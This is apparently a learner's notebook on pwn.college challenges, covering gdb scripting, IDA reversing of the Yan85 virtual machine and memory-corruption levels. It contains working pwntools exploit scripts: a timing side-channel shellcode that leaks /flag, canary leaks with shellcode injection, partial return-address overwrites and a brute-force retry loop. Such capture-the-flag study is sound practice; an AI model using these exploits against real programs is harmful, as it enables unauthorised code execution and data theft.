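Using a label address directly creates a relocation entry; the address has to be formed from rip plus the label's offset so it is resolved at run time.
Use lea to load an address... the lea line cost me more than ten minutes.
The video demonstrates the time command for measuring a program's run time.
The struct can also be written straight onto the stack instead of being laid out in the assembly.
With a larger time range, the duration could encode the ASCII value itself, i.e. one byte per run. That should be faster.
The video uses pwn.log.progress and the level argument of process, which avoids the pile of start/stop messages.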

#!/bin/python
import os
import time
from pwn import *
context.log_level = 'info'
binary = "/challenge/"+os.uname().nodename
context.binary = binary

bck1 = 'mov r8, rdx\nmov r9, r8\nadd r8, 0x100\n'+shellcraft.amd64.read(3, 'r8', 0x100)+'xor rcx, rcx\n'
bck2 = '''
    setnz cl
    sal ecx, 4
    mov [rip+tv_usec+3], cl
    mov rax, 35
    lea rdi, [rip+timeval]
    mov rsi, 0
    syscall
    // the usual illegal instruction: at least it tells me the shellcode ran through
    .ascii "\x0f\x04" 
    timeval:
    tv_sec:  .8byte 0
    tv_usec: .8byte 0
'''

ans = ''
for i in range(60):
    char = 0
    for j in range(8):
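        sc = bck1 # wrapper around read
        # load one byte, then test whether bit j is set
        sc += 'mov cl, [r8+'+hex(i)+']\ntest cl,'+hex(1<<j)+'\n'
        sc += bck2
        # bck2 wraps the nanosleep call: the setnz result, shifted left by 4, is stored into the
        # fourth byte of the second timespec member (counting from the low end, little-endian),
        # giving 268,435,456 ns (1 0000|00000000|00000000|00000000).
        # Without the sleep a run takes about 0.05 s, so 0.2 s is the threshold.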
        payload = asm(sc)
        start = time.time()
        p = process([binary, '/flag'])
        p.sendline(payload)
        p.wait()
        end = time.time()
        elapse = end - start
        if elapse > 0.2:
            char |= 1<<j
    #end for bits loop
    ans += chr(char)

print(ans)
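
The decoding half of the timing channel is plain arithmetic and can be checked without running anything slow. The timings list is invented for illustration; the constants follow the script above.

```python
SLEEP_NS = 0x10 << 24      # 0x10 stored in byte 3 of the nanosecond field
THRESHOLD_S = 0.2          # runs slower than this are read as a 1 bit


def byte_from_timings(elapsed):
    """Rebuild one byte from 8 run times, least significant bit first."""
    value = 0
    for bit, seconds in enumerate(elapsed):
        if seconds > THRESHOLD_S:
            value |= 1 << bit
    return value


# Hypothetical measurements for 'p' (0x70): bits 4, 5 and 6 slept
timings = [0.05, 0.05, 0.05, 0.05, 0.32, 0.31, 0.33, 0.05]
print(SLEEP_NS, chr(byte_from_timings(timings)))
```

The sleep of roughly 0.27 s sits comfortably above the 0.2 s threshold, while a run without sleep (about 0.05 s) stays well below it.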

12.only read

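This time the crash code is the channel: -4 is SIGILL, -11 is SIGSEGV.

# a small change: fall through to the illegal instruction (SIGILL) only when the tested bit is set
bck2 = '''
jz isZero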
.ascii "\x0f\x04"
isZero: .byte 0
'''

if p.poll(1) == -4:
    char |= mask

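13. Wait, sockets??

It uses socketpair for local communication.

There seem to be no real restrictions; it is just a matter of crafting the commands specific to the parent/child protocol.

On to the gdb refresher!

module 6-gdb

GDB time!

info has a lot in it. I spotted i proc m(appings): that is exactly the cat /proc/pid/maps I used last time.
A really nice cheatsheet!
pwndbg's features
A curious tutorial site where the videos are text. link
Three gdb plugins: gef (demo site | doc), and the other two are already installed. peda is still the easiest to install and can even be set up on pwn.college. One more plugin and I would mix them up.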

“Auto-loading safe path” section in the GDB manual.

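The first few levels are nothing special, just a refresher.

Command-line options: /challenge/e* -x gdbscrip -q

level4

It has to be repeated four times, so I modified the loop variable directly. Also, setting a breakpoint before the program is running produces an error; cause to be investigated.

level5

Time to write gdb scripts. Never tried this before, so learning it on the spot.

The gdb manual, 5.1.7 Breakpoint Command Lists, describes a dedicated syntax: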

commands [list...]
... command-list ...
end

Any other command after a command that resumes execution will be ignored.

silent disables the usual message printed when stopping at a breakpoint. Useful commands for controlled output are listed in 23.1.4 Commands for Controlled Output, usually echo, output, and printf.

You can also use breakpoint commands to compensate for one bug and test the other!

e.g.

break foo if x>0
commands
silent
printf "x is %d\n",x
cont
end

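The addresses change on every run, so relative addresses are needed. printf *($rbp-0x18) fails outright with "Attempt to dereference a generic pointer". To dereference a pointer, its type has to be given with a cast.

Set the breakpoint first, then c(ontinue).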

r                           
b *main+709
commands
    silent
    x/gx $rbp-0x18
    set *(int*)($rbp-0x1c)=7
    c
end
c

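So many problems show up once you actually write it yourself...

level6

A fully automatic script. Section 23.1.3 Command Files of the manual introduces some flow control commands, and 5.1.3 Setting Catchpoints is important too.
This time, try to write a script that doesn’t require you to ever talk to the program, and instead automatically solves each challenge by correctly modifying registers / memory.
GDB: Printing Variables to File: not very convenient, since it is a logging file after all.
Use the printf command to write raw bytes to a file.
The commands command attaches commands to a breakpoint.
ddb – interactive kernel debugger

For full automation, my idea is to turn the read from /dev/urandom into a read from stdin and then use r < tmp inside gdb for the redirection. The later scanf reads from stdin as well, so that works out. To exercise conditionally performed gdb commands, the loop variable is left alone.

Setbacks along the way:

~~With a file as input that is read several times, the file offset moves forward each time... so better to change memory instead...~~ It turned out not to be a problem, but a plain >=3 check stops the flag from being opened. So add 4<tmp and change the condition to if $rdi >= 3 && $rdi != 0x44.
The program reopens /dev/urandom every time, perhaps because fresh random numbers need a fresh open??? That way the file descriptor is always 3 or higher.
catch syscall fires both before and after the syscall, so the if statement has to be set up accordingly (calls to and returns from system calls will be caught).
I also wrote = where == was meant. Brilliant.
One more discovery: by line 6 of the script (the set inside the catchpoint) execution is already in another function, since read is only a glibc wrapper. What I had missed is that __GI___libc_read() never does push rbp, so rbp still refers to the same stack frame.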

r <tmp
catch syscall read
commands
    silent
    if($rdi >= 3 && $rdi != 0x44)
        set *(int64_t*)($rbp-0x18) = 0x010203 # set ptr type
    end
    c
end

b *main+630 # stop at scanf()
commands
    silent
    set *(int64_t*)($rbp-0x10) = 0x010203
    c
end
c

A single level can teach this much...

level 7

A single call (void*)win() finishes it.

module 7-rev

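forward engineering vs. reverse engineering
cpp du strip strings commands.
What we do most often is reverse the main modules.
-fomit-frame-pointer
cloud ninja: use this, or simply IDA. With IDA Pro at hand the others are just worth a casual try. The video obviously would never tell you to use a pirated copy :laughing:
I symlinked the other checksec as secheck; it seems to have a few more features.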
Open source:
- angr management: an academic binary analysis framework! (github)
- ghidra: a reversing tool created by the National Security Agency (https://ghidra-sre.org/)
- cutter: a reversing tool created by the radare2 open source project (https://cutter.re/)
dynamic analysis:
- ltrace and strace
- gdb
  - a context view can be emulated with the display command, which prints on every stop.
- Timeless Debugging
  - gdb has built-in record-replay functionality (doc)
  - rr is a highly-performant record-replay engine (github) doc
  - qira is a timeless debugger made for reverse engineering (https://qira.me/)

level1.0-2.1

Nothing special, but the assembly that swaps two characters in 2.1 is worth noting:

movzx   eax, byte ptr [rbp+buf]
mov     byte ptr [rbp+var_10], al
movzx   eax, byte ptr [rbp+buf+1]
mov     byte ptr [rbp+var_10+1], al
movzx   eax, byte ptr [rbp+var_10+1]
mov     byte ptr [rbp+buf], al
movzx   eax, byte ptr [rbp+var_10]
mov     byte ptr [rbp+buf+1], al

level3

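So every level actually tells you which mangler it uses...

level3 is the reverse mangler.

level4

IDA's assembly syntax follows MASM (Microsoft Macro Assembler). Here are some directives.
The high-level language IDA uses is IDC, a C-like language. Things like LOBYTE are covered in the manual.
A char buf[6] was recognized as int buf + int16_t v6; fixing the definition of buf is enough.
Went through some IDA operations.

Since biltw is already in alphabetical order, all that processing leaves it unchanged.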

level5

This challenge is now mangling your input using the xor mangler with key 0xb2

list = [0xFA,0xF6,0xEA,0xF5,0xF1]
print([chr(x^0x98) for x in list])

['b', 'n', 'r', 'm', 'i']

That seems almost too simple...

level6

reverse + sort + xor

str = "8f 8e 8e 8e 8c 82 81 87 86 84 9f 9e 9e 9e 93"
list = str.split(" ")
list1 = [chr(int(x,16)^0xeb) for x in list]
list1.reverse()
res = "".join([x for x in list1])
print(res)

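Mostly an exercise in using Python.

level7

Really complicated... and there are non-printable characters, so the answer has to be turned into bytes and written to a file.

It looks simple, yet it is a little hard (?)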

#!/usr/bin/env python

str = "ff ff fe fc fb fb fb f7 f6 f6 f1 e7 e6 e1 e1 3c 3a 3a 38 37 32 32 20 2c 25 22 21 32 20"
list = str.split(" ")
list[22], list[27] = list[27], list[22]
list.reverse()
print(list)
#print(len(list))
list = [int(x,16) for x in list]
for i in range(0,27,2):
    list[i] ^= 0x95
    list[i+1] ^= 0x56
list[28] ^= 0x95 # odd number of elements
list.reverse()
print(list)


byte = b''.join([x.to_bytes(1,'big') for x in list]) # for needs like this, googling is much faster than reading the docs, especially for simple syntax
print(byte)

with open("/root/Desktop/input", "wb") as o:
    o.write(byte)

level8

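Is this reasonable? It just piles on quantity...

level9

Oh, this one has some substance: it is impossible to tell what is going on, so it needs disassembling.

It uses md5, which cannot be reversed, but the code itself can be modified.

In IDA, types are added under local types (Shift+F1), i.e. open subviews in the View menu. Ctrl+1 = quick view
gdb with set-uid programs and $base
IDA number of operand.

Because mprotect() is used, the code segment can be modified, so just find the jnz and change it to jz, i.e. change the byte at 0x1f01 from 75 to 74.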
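
The one-byte patch is easy to rehearse on a buffer before touching the real target. A sketch with a made-up 4-byte fragment; flip_jnz is a hypothetical helper, and 0x75/0x74 are the short-jump opcodes mentioned above.

```python
JNZ_SHORT, JZ_SHORT = 0x75, 0x74


def flip_jnz(image: bytearray, offset: int) -> None:
    """Turn a short jnz at `offset` into jz, refusing to patch anything else."""
    if image[offset] != JNZ_SHORT:
        raise ValueError("no short jnz at this offset")
    image[offset] = JZ_SHORT


# Hypothetical fragment: test eax, eax ; jnz +5
code = bytearray(b"\x85\xc0\x75\x05")
flip_jnz(code, 2)
print(code.hex())
```

Checking the old byte first guards against patching the wrong offset, which matters once every other byte of the program is hashed as in level 11.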

level10

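A bin_padding function pads main out to a relative address around 2xxx; otherwise the same as above.

level11

IDA's rename option is described in the manual's Give Name to the Location chapter; also looked up the LOCAL and PUBLIC directives.

I still need to look up how the md5 function is used.

Every part of the program is hashed, so modifying anything else fails verification. And only 2 bytes can be modified.

Never mind: patching the two jnz in a row is enough.

level12

Yan85 begins

The LOAD segment is just a segment without a name; IDA puts that name on it by default. The segment description shows things like pure data/code.
Recursive learning:
- IDA showed a text "UTF-16LE", 'abcdsif', and I assumed the seven characters were contiguous. It turns out UTF-16LE is special: converting it to DATA shows the characters separated by \0.
- So I looked up what 16LE is: simply the little-endian version of UTF-16. Byte-Order-Mark etc.
- UTF-8's advantage is that ASCII takes 1 byte, UTF-16's is that non-ASCII takes two bytes, and UTF-32's is that no encoding and decoding is needed.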
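
The interleaved zero bytes are easy to reproduce with the string IDA displayed:

```python
text = "abcdsif"
utf16 = text.encode("utf-16-le")   # little-endian, no byte-order mark
utf8 = text.encode("utf-8")

print(utf16)        # each ASCII character followed by a zero byte
print(len(utf8), len(utf16))
```

For ASCII text the low byte comes first in little-endian order, so every second byte is \0; a C-style strlen on this buffer would stop after the first character.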

# One way memset gets implemented: rep stosq stores rax at [rdi], rcx times (0x20 qwords = 256 bytes here).
lea	rdx, [rbp+var_110]
mov	eax, 0
mov	ecx, 20h
mov	rdi, rdx
rep stosq

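Yan85: a1, a2, a3 are the argument numbers.

main holds a 256-byte memory area (char a1[256+7]) followed by 7 bytes that serve as the seven registers, then enters execute_program.
describe_register converts a number into a name; there are seven of them, each terminated by \0: aNone db 'NONE',0
The describe_* functions may be needed in later levels; to be revisited.
write_register uses a2 as an index into a1[256~262] and writes a3 into the array.

Registers: r1 r2 r3 r4 r5 r6 r7

**Codes:    8  4 64 32 16  2  1**
write_memory is used by the stm instruction

Next, what each instruction does; (reg)x means the register selected by code x.

imm is (reg)a2 = a3, loading an immediate.
stm is effectively mov [(reg)a2 + a1], a3
syscall(a1, a2, a3): taking the registers as r1 r2 ~ r6, it dispatches on a2: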
- 8: open fd = open(&a1[r1], r2, r3); (reg)a3 = fd;
- 4: read v5 = r3+r2>=256 ? -r2 : r3; count = read(r1, &a1[r2], v5), then count is written to (reg)a3
- 1: write v5 = r3+r2>=256 ? -r2 : r3; count = write(r1, &a1[r2], v5), then count is written to (reg)a3
- 16: sleep r1 secs, (reg)a3 = left_time
- 0x20: exit(r1)
- else: exit( (reg)a3 )

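For 12.1, a gdb script would probably make the execution flow easier to follow: dumpargs at every function entry and print the result. For 12.0 I simply read the hints.

12.1 has no function names at all, so the functions need renaming first.

After reading the first part: printf "\x94\x11\x3f\xb3" > input is enough. The flag is then read automatically.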

level13

ldm: load from memory: (reg)a2 = a1[(reg)a3]
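cmp: the comparison result of the two registers is stored in a1[262]; its low five bits act as flags:
less than:  16  (bit 5)
greater:     8  (bit 4)
equal:       4  (bit 3)
not equal:   2  (bit 2)
both zero:   1  (bit 1)
Registers: r1 r2 r3 r4 r5 r6 r7
**Codes:   16 64  1  4  8 32  2**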
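
The flag byte can be modelled in a few lines. This is a sketch built only from the table above: the function name yan85_cmp is made up, and the bit values are the ones seen in this level (they differ between levels).

```python
FLAG_LT, FLAG_GT, FLAG_EQ, FLAG_NE, FLAG_ZERO = 16, 8, 4, 2, 1


def yan85_cmp(a: int, b: int) -> int:
    """Return the flag byte that cmp would store for register values a and b."""
    flags = 0
    if a < b:
        flags |= FLAG_LT
    if a > b:
        flags |= FLAG_GT
    if a == b:
        flags |= FLAG_EQ
    if a != b:
        flags |= FLAG_NE
    if a == 0 and b == 0:
        flags |= FLAG_ZERO
    return flags


for pair in ((1, 2), (9, 2), (3, 3), (0, 0)):
    print(pair, bin(yan85_cmp(*pair)))
```

Several bits can be set at once, for example less-than together with not-equal, so a conditional jump presumably tests a mask rather than an exact value.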

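The video showed a new approach.

Hit an instruction mis-parse: I had to undefine the crash function, convert the bytes to instructions, set the function end, and create a new function.
Static analysis alone is entirely sufficient. Since the 256 bytes of memory are followed by the 7 registers, a struct can be defined, which makes the decompiled result more accurate.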

struct state
{
  char memory[256];
  unsigned __int8 r1;
  unsigned __int8 r2;
  unsigned __int8 r3;
  unsigned __int8 r4;
  unsigned __int8 r5;
  unsigned __int8 r6;
  unsigned __int8 r7;
};

For describe_register() an enum can be defined, so there is no need to keep translating by hand which number belongs to which register.

enum REGISTER : __int8
{
  r1 = 0x1,
  r3 = 0x2,
  r7 = 0x4,
  r4 = 0x8,
  r2 = 0x10,
  r6 = 0x20,
  r5 = 0x40,
};

level14.1

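Not much point here either; it is purely time spent following a flow. Just a simple stacking of complexity: an addition is applied to each byte of the input.

This level first places nine numbers at offset 0x81, then adds a number to each of them, and that is about it.

level15

Again adding a number; did it reluctantly. A waste of time, as expected.

level16.1

Yan85 byte code begins. Going straight at the version without symbols and starting the guesswork.

~~IDA's decompilation went wrong; the assembly that reverses the order of the first three bytes is really bizarre, full of sign extensions, zero extensions and so on.~~ Then it turned out there was no problem.

The instruction encoding turns out to have this structure: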

struct inst
{
  __int8 oprnd_1;
  __int8 opcode;
  __int8 oprnd_2;
  __int8 padding; //useless
};
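
The same layout can be decoded outside IDA. A sketch assuming the instruction arrives as a little-endian dword, with the register codes observed in level16.1; the opcode value 0x20 in the example is invented.

```python
# Register codes as observed in level16.1 (they change from level to level)
REGISTERS = {1: "r1", 16: "r2", 4: "r3", 64: "r4", 32: "r5", 8: "r6", 2: "r7"}


def decode(word: int):
    """Split a dword into (oprnd_1, opcode, oprnd_2), ignoring the padding byte."""
    oprnd_1 = word & 0xFF
    opcode = (word >> 8) & 0xFF
    oprnd_2 = (word >> 16) & 0xFF
    return oprnd_1, opcode, oprnd_2


def reg_name(code: int) -> str:
    return REGISTERS.get(code, "NONE")


op1, opcode, op2 = decode(0x00102001)   # hypothetical instruction word
print(reg_name(op1), hex(opcode), reg_name(op2))
```

This mirrors the (ESI & 0xff0000) >> 16 expression used for the second operand in the IDC scripts.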

Scripts are written in IDC inside IDA (a gdb script would work too; it can also set temporary variables and the like).

ADD

auto reg1 = SIL;
auto reg2 = (ESI & 0xff0000) >> 16;
auto s1; auto s2;

if(reg1==1) s1 = "r1";
else if(reg1==16) s1 = "r2";
else if(reg1==4) s1 = "r3";
else if(reg1==64) s1 = "r4";
else if(reg1==32) s1 = "r5";
else if(reg1==8) s1 = "r6";
else if(reg1==2) s1 = "r7";

if(reg2==1) s2 = "r1";
else if(reg2==16) s2 = "r2";
else if(reg2==4) s2 = "r3";
else if(reg2==64) s2 = "r4";
else if(reg2==32) s2 = "r5";
else if(reg2==8) s2 = "r6";
else if(reg2==2) s2 = "r7";

msg("\tADD: %s = %s + %s\n", s1, s1, s2);

return 0;

POP:

auto reg1 = (get_wide_dword(RBP-0x10) & 0xff);
auto s1;

// register-name lookup omitted

msg("\tPOP: %s=0x%x is %c, rsp=0x%x\n", s1, RDX, RDX, RSI-1);
return 0;

STM:

auto reg1 = get_wide_byte(RBP-0x20) & 0xff;
auto reg2 = (get_wide_dword(RBP-0x20) & 0xff0000) >> 16;
auto s1; auto s2;

// register-name lookup omitted

msg("\tSTM: *%s = %s\n", s1, s2);
return 0;

LDM:

auto reg1 = get_wide_byte(RBP-0x10) & 0xff;
auto reg2 = (get_wide_dword(RBP-0x10) & 0xff0000) >> 16;
auto s1; auto s2;

// register-name lookup omitted

auto mem = AL;
msg("\tLDM: %s = *(%s); mem:0x%x\n", s1, s2, mem);
return 0;

CMP:

auto reg1 = get_wide_byte(RBP-0x20) & 0xff;
auto reg2 = (get_wide_dword(RBP-0x20) & 0xff0000) >> 16;
auto s1; auto s2;

// register-name lookup omitted

auto r1=get_wide_byte(RBP-0x2);
auto r2=get_wide_byte(RBP-0x1);
msg("\tCMP: %s:%s 0x%x:0x%x\n", s1, s2, r1, r2);
return 0;

print all regs:

auto r1=get_wide_byte(RDI+1024);
auto r2=get_wide_byte(RDI+1025);
auto r3=get_wide_byte(RDI+1026);
auto r4=get_wide_byte(RDI+1027);
auto r5=get_wide_byte(RDI+1028);
auto r6=get_wide_byte(RDI+1029);
auto r7=get_wide_byte(RDI+1030);

msg("\t    [V] r1:0x%x r2:0x%x r3:0x%x r4:0x%x r5:0x%x r6:0x%x r7:0x%x\n", r1,r2,r3,r4,r5,r6,r7);

return 0;

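With these in place the output is very pretty, but long, and it follows the program flow, which does not help an overall static analysis. Next time, try to bypass all the jumps and print the code in order; jumping back and forth is really hard to read.

The result is a simple string equality check, 9 bytes in total. It is all in the log file.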

level17

if(reg1==2) s1 = "r1";
else if(reg1==32) s1 = "r2";
else if(reg1==16) s1 = "r3";
else if(reg1==1) s1 = "r4";
else if(reg1==4) s1 = "r5";
else if(reg1==64) s1 = "r6";
else if(reg1==8) s1 = "r7";

if(reg2==2) s2 = "r1";
else if(reg2==32) s2 = "r2";
else if(reg2==16) s2 = "r3";
else if(reg2==1) s2 = "r4";
else if(reg2==4) s2 = "r5";
else if(reg2==64) s2 = "r6";
else if(reg2==8) s2 = "r7";

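Skipping this for now. It feels like piled-up complexity, or maybe I am heading in the wrong direction. Will come back to it.

level18

Yan85 shellcoding. Doing the .0 variant directly to save effort.

The input is 0x300uLL bytes of bytecode: the first 768 bytes are instructions (at most 256 of them), followed by the memory area and then the registers.

With full control, first put the string /flag into memory, then open(path in memory) -> read to memory -> write to stdout. After that it only has to be matched to this level's registers, operands and byte order. A Python function to generate it automatically is probably needed.

level19

Even more unusual. The key is the rerandomize() function: registers, instructions, system calls and cmp flag bits are all randomized. The method is to pick two of 8 int8 values at random and swap them, 65535 times.

Is the point to find what stays constant amid the change?

Although it is random, because of how rand works (the seed depends on the flag) the values are the same on every run, so writing some logic to brute force a few instructions and values is enough.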

module 8-exp

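As of April 22, 2022, C ranks second among programming languages, and second is also the lowest it has ever ranked. Most reverse-engineering tools decompile to a C-like language, because C is the language closest to assembly. It gives developers the choice of a high-level language instead of manipulating registers directly in assembly, and it is used heavily in operating systems and other software. The problems that come with C's complete control over memory will not disappear in the near future; some embedded devices, for example, still need C for development.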

from pwn import *
r = gdb.debug('./balabala')
test_string = cyclic(128) 	# used to identify the location of overflow string
cyclic_find("gaaa")

stack canary mitigations:
- leak the canary.
- brute-force the canary(for forking processes)
- modify the canary.
- by forking processes, it can test repeatedly and figure out what the canary is.
- the canary begins with null-byte.
aslr mitigation:
- all segments are aligned to 0x1000, so changing the least significant byte(s) of a pointer can redirect the flow to another position.
- setarch x86_64 -R /bin/zsh command
uninitialized data.
- but gcc with high level optimization will probably remove the memset function, as it seems to be pointless.

Set up a combined pwndbg + tmux view; it feels just a tiny bit useful... Also managed to nest screen inside tmux.
Using gdb with a core file (stackoverflow)
- ulimit -c unlimited: lifts the size limit on core dump files; it can also go straight into zshrc.
- then gdb-pwndbg [filename] [coredump]
- The video uses cyclic together with gdb on the core file to look at the return address and so find where buf overflows.
- valgrind works too, though it takes many options.
- pwntools has core dump support as well.

level1-2

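Simple enough that I have forgotten the details.

level3-4

Overwrite the return address.

level5

Debugging under gdb misbehaves: a read with a large size fails with bad address, which does not happen when running directly.

level6

Reuse the stack: after overwriting the return address, also rewrite the four bytes starting at rbp+0x4 to 0x1337 (4919).

The challenge frame has some unused space; presumably it is just alignment.

Nothing special after all: the address is fixed at 0x40000, so skip the check in win_auth and go straight to reading the flag.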

level7

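Much like rev level 18, but Yan85's open syscall is disabled. It says there is a memory error; where is it?

All protections off, executable stack. The libc function open is not there at all, so control has to be hijacked into shellcode. Where to inject it?

Found it: a read into stack space has no bounds check:

Note that r2 and r3 are only 1 byte each, so the reach is about 256 at most.
No protections are enabled anyway, so the shellcode's position can be determined directly. It is 36 bytes long in total.
The shellcode has to make a syscall; chmod is the simple choice. The shellcode is placed in the initial byte code. Decoding the shellcode as Yan85 instructions may cause trouble, so before the byte code ends r6 has to be changed to jump straight to the end of the instructions.
The write starts right at memory[1024] and covers 8 B of registers, 9 B of stack space, 8 B of saved rbp and finally the return address, which is pointed at the position of the shellcode.
- One more detail: when r6 is overwritten it can be set to 256 directly, so execution ends at the next decode and no extra instructions are needed to modify r6.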

level8

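This level adds a canary and PIE on top of the previous one.

The rest should be the same, including the overflow point. Also, write has no bounds check either, which can be used to leak the canary and rbp.

level9

Protections partly on; open is available, read_code is disallowed, read has no boundary check but write does.

Only one syscall is allowed in the byte code.

But the destination of read_memory turns out to be the instruction area, so this call can be used to feed in new code that overwrites the old.

level10

This time the read_memory bug from the previous level is fixed, and still only one syscall can be used. Bounds checks everywhere.

What now???

level11

JIT spray, Yan85_64, all protections on, entirely new logic; giving up for now.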

module 9-mem

nothing special.

level1

canary disabled.

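Inject shellcode into a mapped region, then overwrite the return address to jump to it.

level2

All protections off, executable stack. Really nothing to it: without PIE the stack is at the same place every time, so the injected shellcode can be located by absolute address.

level3

Even the lowest 12 bits of stack addresses are random. Could it be that _start and __libc_start_main use a different amount of stack on each run? Or perhaps ASLR moves the stack base as well.
So this time rbp has to be leaked too.

first exec challenge to leak canary and inject shellcode.
second exec to leak first challenge’s rbp, and then calc the shellcode position.
third exec to jmp to shellcode.

~~Wait, main's rbp can be leaked along with the canary in the first round.~~ Never mind: main's rbp could be used, but it is unnecessary.

There is no push imm64 instruction.
At first I used chmod + .ascii "flag", but found that I had added a null byte myself, so the stack is the only way to try. Thinking about it, moving the stack pointer by 8 does not disturb the first challenge frame. Switched to the following; mind the little-endian order.
[hex(ord(character)) for character in '/flag'] => ['0x2f', '0x66', '0x6c', '0x61', '0x67']
I did not expect hand-written shellcode to contain so many null bytes. Gave up hand-writing and switched to pwntools generation.
The size was too large, so even the newline after REPEAT got read in.
Null bytes inside the canary or rbp cannot be helped... just retry a few times.
IDA had a variable definition wrong: there is a pointer to the char array, and the read argument even showed a dereference of buf. It took me ages to notice.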

# buf is at rbp-0x38, the canary at rbp-0x8
import sys
from pwn import * 
from glob import *
context.log_level = 'debug'
#binary = glob("/challenge/t*")[0]
binary = "./toddlerone_level3.1.elf64"
context.binary = binary
p = process(binary) 

# round 1: leak the canary
p.recvuntil("size: ")
p.sendline(b'57')
p.recvuntil("bytes)!\n")
shellcode=shellcraft.amd64.chmod('/flag', '0x04')
payload = asm(shellcode) 
payload = payload.ljust(0x40-8-6+1)
payload += b'REPEAT'
p.sendline(payload)
p.recvuntil(b'REPEAT')
canary = p.recv(7).rjust(8,b'\x00')
print(b'canary'+canary)

# round 2: leak rbp
p.sendlineafter("size: ", b'64')
payload = b'b'*(0x40-6)+b'REPEAT'
p.sendlineafter("bytes)!\n", payload)
p.recvuntil(b'REPEAT')
rbp_byte = p.recv(6).ljust(8,b'\x00')
rbp = int.from_bytes(rbp_byte, byteorder='little')
print('rbp = '+hex(rbp))

# round 3: run the shellcode
p.sendlineafter("size: ", b'200')
payload = b'b'*0x38+canary+b'b'*8+p64(rbp-0x40)
p.sendlineafter("bytes)!\n", payload)
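
Why 57 bytes leak the canary can be seen on a toy stack frame. Everything here is simulated: the canary and rbp values are invented, the offsets follow the exploit (56 bytes up to the canary), and c_string imitates what printf's %s does.

```python
def c_string(memory: bytes, start: int) -> bytes:
    """Return the bytes %s would print: everything up to the first null."""
    end = memory.index(b"\x00", start)
    return memory[start:end]


canary = b"\x00" + bytes.fromhex("a1b2c3d4e5f607")   # hypothetical value
saved_rbp = bytes.fromhex("10e0ffffff7f0000")        # hypothetical value
frame = bytearray(b"\x00" * 56 + canary + saved_rbp)

# 57 bytes: the final 'T' of REPEAT lands on the canary's leading null byte
payload = b"b" * 51 + b"REPEAT"
frame[:len(payload)] = payload

leak = c_string(bytes(frame), 0).split(b"REPEAT", 1)[1]
recovered_canary = leak[:7].rjust(8, b"\x00")
recovered_rbp = leak[7:13].ljust(8, b"\x00")
print(recovered_canary.hex(), recovered_rbp.hex())
```

The rjust/ljust calls put back the null bytes that %s could not print: one at the low end of the canary, two at the high end of the pointer.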

level4

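Looks no different from the previous level, except that the last 8 bytes of the 88-byte array must hold a specific number for the function to return normally.

%s is unrestricted. Executable stack.

# nearly identical code, not reproduced here.

level5

The else branch of the repeat path adds a seccomp filter; again it makes no real difference.

level6

This time there is a real difference: the seccomp filter cannot be avoided when challenge returns. Same protections; the stack is still executable.

Only write and exit_group are allowed. Is this even doable? Once loaded, the filter restricts all of the remaining execution.

Never mind: even the contents of the restriction can be modified. Just change it to what I want. Two syscalls are allowed in total.

Changing them to 90 (chmod) and 91 (fchmod) does it.

level7

PIE is added. Randomized addresses are still 4 KB aligned, so overwrite only the last two bytes; the top four bits of those (the '2' in \x29) are down to luck.

Editing the binary file in vim saved the non-printable characters as question marks... better to modify it some other way.
Either use a hex editor, or in vim use set binary or the -b option, then %!xxd

pl = b'b'*0x68 + b'\xa4\x29'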
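
The odds of the two-byte overwrite can be counted directly. A sketch with invented addresses: the low 12 bits (0x9a4) are fixed by page alignment, and only bits 12-15 of the real target vary between runs.

```python
def partial_overwrite(ret_addr: int, low_two: bytes) -> int:
    """Replace the low 16 bits of a saved return address."""
    return (ret_addr & ~0xFFFF) | int.from_bytes(low_two, "little")


hits = 0
for nibble in range(16):                       # every possible value of bits 12-15
    region = 0x555555550000                    # hypothetical 64 KiB-aligned region
    target = region | (nibble << 12) | 0x9A4   # where win really is on this run
    original_ret = region | (nibble << 12) | 0x123
    if partial_overwrite(original_ret, b"\xa4\x29") == target:
        hits += 1

print(f"{hits} of 16 layouts hit the target")
```

So the payload works on roughly one run in sixteen, which is why such exploits are simply run in a loop until they succeed.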

level8

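A region of the given size (70 to 80 bytes) is malloc'ed on the heap, but its length is measured with strlen, so putting a null byte into the padding gets past the check.

PIE is on as well; handle it as in the previous level.

level9

All protections on. RELRO

The biggest problem is the canary.

Got it: by exploiting how the write is addressed in memory, the canary can be skipped and the return address modified directly.

Thinking that 0x79 is followed by 0x80 was quite something. Next time, always write hex with a prefix.

pl = b'b'*92+b'\x77\x1a\x3f'

level10

The flag has already been read onto the stack. For printf's %s to print it, fill the 110 bytes of buf in front of it with non-zero bytes; the flag follows immediately, so %s does not stop at offset 110.

pl = b'b'*110

level11

All protections on. This level is about mmap, whose mechanics I had not looked at in detail before. A YouTube video on it is decent.

Several consecutive mmap calls have no address hint, so the regions are all adjacent. They are mapped toward lower addresses, so the last mapped region ends up at the lowest address.

The last map asks for only 0x5c bytes but still gets a whole 0x1000 page, readable and writable. What I do not understand is why the /flag mapping, which is execute-only, can still be read by printf.

So the result is simple: 0x3000 bytes is enough.

level12

Still all on.

challenge can be run repeatedly; leak the canary, perhaps? And there is a printf %s too.

First send 0x19 filler bytes (there is an undefined region between buf and the canary) to leak the canary, then enter challenge again.
To jump to win, challenge has to run to completion, i.e. pass the canary check. The first pass overwrote the first byte of the canary and is bound to fail; the second pass uses the leaked canary to pass the check and overwrites the low two bytes of the return address.
Put that way, this calls for pwntools.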

from pwn import *
context.arch = 'amd64'
context.log_level = 'debug'
while 1:
    p = process('./babymem_level12.1.elf64')

    p.sendline(b'25')
    pl = b'REPEAT'.rjust(0x20-8+1)
    p.sendline(pl)

    p.recvuntil(b'REPEAT')
    canary = p.recv(7).rjust(8,b'\x00')
    print(canary)
    p.sendline(b'42')
    pl = b'b'*0x18 + canary+b'b'*8+b'\xa4\x23'
    p.sendline(pl)                             

    all = p.recvall()
    if b'flag' in all:
        print(all)
        break	# keep trying until it succeeds
    #break

level13

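Everything on!

Reuse stack contents that were never cleared. The flag sits in the 0x100 bytes starting at rbp-0x10f, so inside the challenge frame it can be read from that same position. Oddly, a large block of space is left undefined. Perhaps an array was declared and never used? In that case the compiler evidently did not optimize it away.

v5 starts at rbp-0x120, so 0x120 - 0x10f = 0x11 (17) filler bytes reach the flag.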

pl = b'b'*17                                                    
with open('/mnt/hgfs/LearingList/pwn.college/input', 'wb') as o:
    o.write(b'17\n'+pl)

level14

Again a canary leak; the problem is that printf() limits the output to 452 bytes, while buf is 456 bytes.

………….

level15

A TCP connection; use the behaviour of fork to get around the canary (every forked child carries the same canary).

tcp_socket = socket(AF_INET, SOCK_STREAM, 0);
udp_socket = socket(AF_INET, SOCK_DGRAM, 0);
raw_socket = socket(AF_INET, SOCK_RAW, protocol);

https://docs.pwntools.com/en/stable/tubes/sockets.html, exempli gratia:

In [8]: import pwn 
   ...:  
   ...: pwn.context.encoding = "latin-1" 
   ...:  
